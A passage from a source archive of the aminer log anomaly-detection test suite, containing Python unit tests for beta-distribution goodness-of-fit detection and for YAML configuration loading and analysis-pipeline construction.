[[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == nor_result_shapes_ks) self.assertTrue(result_list_cm == nor_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 1: variable_type_ini = 
variable_type_ini[:-1] elif 'beta1' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 1: variable_type_ini = variable_type_ini[:-1] elif 'beta1' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta1_result_shapes_ks) self.assertTrue(result_list_cm == beta1_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif 'beta2' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 2: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the 
result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif 'beta2' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 2: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta2_result_shapes_ks) self.assertTrue(result_list_cm == beta2_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif 'beta3' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = 
vtd_cm.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif 'beta3' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta3_result_shapes_ks) self.assertTrue(result_list_cm == beta3_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif 'beta4' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif 'beta4' in [distr[0]+str(distr[-1]) for distr in 
variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta4_result_shapes_ks) self.assertTrue(result_list_cm == beta4_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif 'beta5' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta5_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == 'beta' and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif 'beta5' in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == 'beta' and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ['others', 0] # Test and save the result of the s_gof-Test etd.values = [[beta5_data_list_upd[i * 
dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta5_result_shapes_ks) self.assertTrue(result_list_cm == beta5_result_shapes_cm) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/__init__.py000066400000000000000000000000001437606560100257060ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/000077500000000000000000000000001437606560100226755ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/YamlConfigTest.py000066400000000000000000001475021437606560100261500ustar00rootroot00000000000000import unittest import importlib import yaml import sys import re import aminer.AminerConfig as AminerConfig from datetime import datetime from aminer.AnalysisChild import AnalysisContext from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.analysis.HistogramAnalysis import HistogramAnalysis, PathDependentHistogramAnalysis from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from aminer.analysis.MatchFilter import MatchFilter from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from 
aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from time import time from unit.TestBase import TestBase class YamlConfigTest(TestBase): """Unittests for the YamlConfig.""" sysp = sys.path def setUp(self): """Add the aminer syspath.""" TestBase.setUp(self) sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] def tearDown(self): """Reset the syspath.""" TestBase.tearDown(self) sys.path = self.sysp def test1_load_generic_yaml_file(self): """Loads a yaml file into the variable 
aminer_config.yaml_data."""
        # YamlConfig is loaded from its installed path as a fresh module object, so the module-level yaml_data
        # is presumably isolated per test rather than shared through the package import.
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/template_config.yml')
        self.assertIsNotNone(aminer_config.yaml_data)

    def test2_load_notexistent_yaml_file(self):
        """Try to load a nonexistent yaml file; load_yaml must raise a FileNotFoundError."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        with self.assertRaises(FileNotFoundError):
            aminer_config.load_yaml('unit/data/configfiles/doesnotexist.yml')

    def test3_load_invalid_yaml_file(self):
        """Try to load a file with invalid yaml syntax; load_yaml must raise a yaml.YAMLError."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        with self.assertRaises(yaml.YAMLError):
            aminer_config.load_yaml('unit/data/configfiles/invalid_config.yml')

    def test4_load_yaml_file_with_invalid_schema(self):
        """Tries to load a yaml-file with an invalid schema.
A ValueError is expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/invalid_schema.yml') def test5_analysis_pipeline_working_config(self): """This test builds a analysis_pipeline from a valid yaml-file.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiple_components.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], TimestampsUnsortedDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.registered_components[4][0], HistogramAnalysis)) self.assertTrue(isinstance(context.registered_components[5][0], PathDependentHistogramAnalysis)) self.assertTrue(isinstance(context.registered_components[6][0], EnhancedNewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.registered_components[7][0], MatchFilter)) self.assertTrue(isinstance(context.registered_components[8][0], MatchValueAverageChangeDetector)) self.assertTrue(isinstance(context.registered_components[9][0], MatchValueStreamWriter)) self.assertTrue(isinstance(context.registered_components[10][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[11][0], TimeCorrelationViolationDetector)) self.assertTrue(isinstance(context.registered_components[12][0], 
AllowlistViolationDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[1], SyslogWriterEventHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[2], DefaultMailNotificationEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[1].element_id, 'sp0') self.assertEqual(context.atomizer_factory.parsing_model.children[1].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[3], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[3].element_id, 'sp1') self.assertEqual(context.atomizer_factory.parsing_model.children[3].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[4], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[5], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[5].element_id, 'sp2') self.assertEqual(context.atomizer_factory.parsing_model.children[5].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[6], DateTimeModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[7], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[7].element_id, 'sq3') 
self.assertEqual(context.atomizer_factory.parsing_model.children[7].fixed_data, b' "') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[8], FixedWordlistDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[9], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[9].element_id, 'sp3') self.assertEqual(context.atomizer_factory.parsing_model.children[9].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[10], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[11], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[11].element_id, 'http1') self.assertEqual(context.atomizer_factory.parsing_model.children[11].fixed_data, b' HTTP/') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[12], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[13], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[13].element_id, 'sq4') self.assertEqual(context.atomizer_factory.parsing_model.children[13].fixed_data, b'" ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[14], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[15], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[15].element_id, 'sp4') self.assertEqual(context.atomizer_factory.parsing_model.children[15].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[16], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[17], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[17].element_id, 'sq5') 
self.assertEqual(context.atomizer_factory.parsing_model.children[17].fixed_data, b' "-" "')
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[18], VariableByteDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[19], FixedDataModelElement))
        self.assertEqual(context.atomizer_factory.parsing_model.element_id, 'accesslog')

    def test6_analysis_fail_without_parser_start(self):
        """Check that a config whose parser list has no start-tag is rejected with a ValueError."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        with self.assertRaises(ValueError):
            aminer_config.load_yaml('unit/data/configfiles/missing_parserstart_config.yml')

    def test7_analysis_fail_with_double_parser_start(self):
        """Check that a config with two start-tagged parser models is rejected with a ValueError."""
        # NOTE(review): the previous docstring was a copy of test6's ("fails without a start-tag"); the fixture
        # name indicates this test covers the duplicate start-tag case instead.
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        with self.assertRaises(ValueError):
            aminer_config.load_yaml('unit/data/configfiles/double_parserstart_config.yml')

    def test8_analysis_fail_with_unknown_parser_start(self):
        """Check that the config-schema-validator raises a ValueError when an unknown parser type is configured."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        with self.assertRaises(ValueError):
            aminer_config.load_yaml('unit/data/configfiles/unknown_parser_config.yml')
        # Load a second time to pin the exact validator message, so an unknown type is reported and not silently accepted.
        try:
            aminer_config.load_yaml('unit/data/configfiles/unknown_parser_config.yml')
        except ValueError as e:
            self.assertEqual("{'Parser': [{0: [{'type': [\"field 'type' cannot be coerced: No module named 'UnknownModel'\"]}]}]}", str(e))

    def test9_analysis_pipeline_working_config_without_analysis_components(self):
        """Check that the config loads and the pipeline builds without any analysis components."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/multiple_components_null_analysis_components.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        self.run_empty_components_tests(context)
        # Also cover the case where the Analysis key is absent entirely, not just empty.
        del aminer_config.yaml_data['Analysis']
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        self.run_empty_components_tests(context)

    def test10_analysis_fail_with_unknown_analysis_component(self):
        """Check that the config-schema-validator raises a ValueError when an unknown analysis component is configured."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        with self.assertRaises(ValueError):
            aminer_config.load_yaml('unit/data/configfiles/unknown_analysis_component.yml')
        # Second load pins the exact error text emitted by the schema validator.
        try:
            aminer_config.load_yaml('unit/data/configfiles/unknown_analysis_component.yml')
        except ValueError as e:
            self.assertEqual("Config-Error: {'Analysis': [{2: ['none or more than one rule validate', {'Analysis error': 'unallowed value"
                             " UnknownDetector'}]}]}", str(e))

    def test11_analysis_fail_with_unknown_event_handler(self):
        """Check that the config-schema-validator raises a ValueError when an unknown event handler is configured."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        with self.assertRaises(ValueError):
aminer_config.load_yaml('unit/data/configfiles/unknown_event_handler.yml')
        # Second load pins the exact error text, so a misspelled handler type cannot be coerced into a silent default.
        try:
            aminer_config.load_yaml('unit/data/configfiles/unknown_event_handler.yml')
        except ValueError as e:
            self.assertEqual("{'EventHandlers': [{0: [{'type': [\"field 'type' cannot be coerced: No module named "
                             "'aminer.events.UnknownPrinterEventHandler'\"]}]}]}", str(e))

    def test12_analysis_pipeline_working_config_without_event_handler_components(self):
        """
        Check that the config loads without any event handler components.

        Per the original author this also covers that the StreamPrinterEventHandler is loaded by default in that case
        (asserted inside run_empty_components_tests, which is defined outside this excerpt).
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/multiple_components_null_event_handlers.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        self.run_empty_components_tests(context)
        # Same check with the EventHandlers key removed entirely, not just left empty.
        del aminer_config.yaml_data['EventHandlers']
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        self.run_empty_components_tests(context)

    def test13_analysis_pipeline_working_with_json(self):
        """Check that a JsonConverterHandler configured in yaml is built as the first event handler."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/json_config.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter))
        self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector))
        self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], JsonConverterHandler))
self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0].json_event_handlers[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) def test14_analysis_pipeline_working_with_learnMode(self): """This test checks if learnMode is working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/learnMode_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) # specific learn_mode arguments should be preferred. 
context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(context.registered_components[1][0].learn_mode) self.assertTrue(context.registered_components[2][0].learn_mode) self.assertFalse(context.registered_components[3][0].learn_mode) # unset specific learn_mode parameters and set LearnMode True. for component in aminer_config.yaml_data['Analysis']: del component['learn_mode'] context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for key in context.registered_components: if hasattr(context.registered_components[key][0], 'learn_mode'): self.assertTrue(context.registered_components[key][0].learn_mode) # unset specific learn_mode parameters and set LearnMode False. aminer_config.yaml_data['LearnMode'] = False context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for key in context.registered_components: if hasattr(context.registered_components[key][0], 'learn_mode'): self.assertFalse(context.registered_components[key][0].learn_mode) # unset LearnMode config property. An Error should be raised. 
del aminer_config.yaml_data['LearnMode'] context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test15_analysis_pipeline_working_with_input_parameters(self): """This test checks if the SimpleMultisourceAtomSync and SimpleByteStreamLineAtomizerFactory are working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiSource_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/model/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) # test with MultiSource: True. Expects a SimpleByteStreamLineAtomizerFactory with a SimpleMultisourceAtomSync. self.assertTrue(isinstance(context.atomizer_factory, SimpleByteStreamLineAtomizerFactory)) self.assertTrue(isinstance(context.atomizer_factory.atom_handler_list[0], SimpleMultisourceAtomSync)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']]) # test with MultiSource: False. Expects a SimpleByteStreamLineAtomizerFactory with a AtomFilters.SubhandlerFilter. 
aminer_config.yaml_data['Input']['multi_source'] = False context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.atomizer_factory, SimpleByteStreamLineAtomizerFactory)) self.assertTrue(isinstance(context.atomizer_factory.atom_handler_list[0], SubhandlerFilter)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']]) def test16_parsermodeltype_parameter_for_another_parsermodel_type(self): """This test checks if all ModelElements with child elements are working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/model/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, FirstMatchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[0], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[1], RepeatedElementDataModelElement)) self.assertTrue(isinstance( 
